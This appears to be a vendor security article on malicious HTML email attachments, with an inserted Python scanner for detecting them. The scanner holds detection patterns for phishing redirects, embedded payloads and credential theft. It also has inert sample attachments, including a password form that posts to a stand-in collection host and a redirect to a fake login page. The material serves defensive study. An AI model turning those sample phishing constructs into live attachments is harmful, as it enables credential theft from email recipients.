E-mail attacks: HTML attachments most dangerous


HTML attachments are still the most dangerous file type in email attacks. As a result, attackers are relying more on HTML attachments: their share has doubled in a year, according to Barracuda Networks.

Hypertext Markup Language, HTML for short, is used to create and structure content presented online, and it is often used in e-mail communication as well. Practical, well-designed technologies also tend to be popular with criminals, and HTML is indeed a very welcome attack tool in phishing, for example to disguise the theft of login data. What's more, in the last ten months, the number of HTML attachments scanned by Barracuda systems that turned out to be malicious has more than doubled. While it was already 21 percent in May last year, the share of scanned HTML files found to be malicious rose to 45.7 percent in March 2023.

Many different attacks with individual files

When the recipient opens the HTML file, JavaScript libraries hosted elsewhere send them through multiple redirects to a phishing website or other malicious content that the criminals control. Users are prompted to sign in to access requested information or to download a file that may contain malware. But it gets even more insidious.

In some cases, Barracuda researchers have observed that the HTML file itself contains sophisticated malware that embeds the entire malicious payload, including potent scripts and executable files. In contrast to externally hosted JavaScript files, this attack technique is now being used more and more frequently. Therefore, it is important to analyze the entire email with HTML attachments, all redirects, and the content of the email for malicious intent.

Another new feature of the attacks is their diversity. The growing number of malicious files detected is not simply the result of a limited number of mass attacks, but rather of many different types of attacks, each using specially crafted files. Around a quarter (27 percent) of the files discovered are now unique, with the remaining three quarters being repetitions or mass distributions of these files.

HTML attachments top the list of file types used for malicious purposes: not only is their overall volume increasing, they also remain the most common file type used for malicious purposes. Why is that? Because it still works reliably!

What protects against malicious HTML attachments?

  • Effective email protection recognizes malicious HTML attachments and can block them. Because these aren't always easy to spot, as described, powerful solutions include machine learning and static code analysis, which examines the content of an email and not just its attachment.
  • Educate employees and raise their awareness so that they can identify and report potentially malicious HTML attachments. Given the scope and variety of this type of attack, it is always advisable to be cautious with all HTML attachments, especially those from unknown sources. Login credentials must never be passed on to third parties.
  • Multi-factor authentication (MFA) is still a good access control. Nonetheless, criminals are increasingly employing advanced social engineering techniques, such as relying on employee MFA fatigue. Zero Trust Access measures increase security. An effective Zero Trust solution dynamically monitors multiple parameters: user, device, location, time, the resources being accessed, and others. This makes it much more difficult for attackers to compromise the network with stolen credentials.
  • However, should a malicious HTML file get through, remediation tools should be in place to quickly identify and remove malicious emails from everyone's inboxes. Automated incident response can help do this before the attack spreads throughout an organization. Additionally, Account Takeover Protection can monitor suspicious account activity and alert you when credentials are compromised.
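The static checks mentioned in the first point can be sketched for the two attachment patterns described earlier: redirects through externally hosted scripts, and payloads embedded in the file itself. This is an added example, not Barracuda's detection logic; the heuristics, finding names and sample attachments are assumptions constructed for illustration.

```python
import re
from html.parser import HTMLParser
# Heuristic patterns (illustrative assumptions, not a vendor rule set).
REMOTE = re.compile(r"\s*(?:https?:)?//", re.I)
REDIRECT_JS = re.compile(r"\blocation(?:\.href)?\s*=(?!=)|\blocation\.(?:replace|assign)\s*\(")
DECODE_JS = re.compile(r"\b(?:atob|unescape|eval)\s*\(|String\.fromCharCode")
BLOB_JS = re.compile(r"new\s+Blob\s*\(|msSaveOrOpenBlob")
LONG_B64 = re.compile(r"[A-Za-z0-9+/]{200,}")

class AttachmentScanner(HTMLParser):
    def __init__(self):
        super().__init__()
        self.findings, self.script, self.in_script, self.form_remote = set(), [], False, False

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "script":
            self.in_script = True
            if REMOTE.match(a.get("src", "")):      # script pulled from another host
                self.findings.add("remote-script")
        elif tag == "meta" and a.get("http-equiv", "").lower() == "refresh":
            self.findings.add("meta-refresh")
        elif tag == "form":
            self.form_remote = bool(REMOTE.match(a.get("action", "")))
        elif tag == "input" and a.get("type", "").lower() == "password":
            self.findings.add("credentials-posted-remotely" if self.form_remote else "password-field")

    def handle_data(self, data):
        if self.in_script: self.script.append(data)  # inline JS may arrive in chunks

    def handle_endtag(self, tag):
        if tag == "form": self.form_remote = False
        if tag != "script": return
        js, self.script, self.in_script = "".join(self.script), [], False
        if REDIRECT_JS.search(js): self.findings.add("js-redirect")
        if DECODE_JS.search(js): self.findings.add("runtime-decoding")
        # A Blob built next to a long base64 run suggests a payload carried in the file.
        if BLOB_JS.search(js) and LONG_B64.search(js): self.findings.add("embedded-payload")

def scan_html(html):
    scanner = AttachmentScanner()
    scanner.feed(html)
    scanner.close()
    return scanner.findings

# Constructed, inert sample attachments (hosts use the reserved .invalid TLD).
SAMPLE_REDIRECT = '<script src="https://cdn.example.invalid/lib.js"></script><script>window.location.href = "https://login.example.invalid/";</script>'
SAMPLE_FORM = '<form action="https://collect.example.invalid/p" method="post"><input type="password" name="p"></form>'
SAMPLE_EMBEDDED = '<script>var d = atob("' + "QUFB" * 60 + '");var b = new Blob([d]);</script>'
SAMPLE_BENIGN = '<html><body><p>Quarterly report</p><a href="https://example.invalid/">link</a></body></html>'
```

Findings like these are triage signals for the attachment only; the message body and every redirect target still need to be examined, as the article notes.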

Adequate cybersecurity is essential given the increasing number of HTML attacks. A layered approach of security tools and employee education can help organizations effectively defend against this threat.

More at Barracuda.com

 

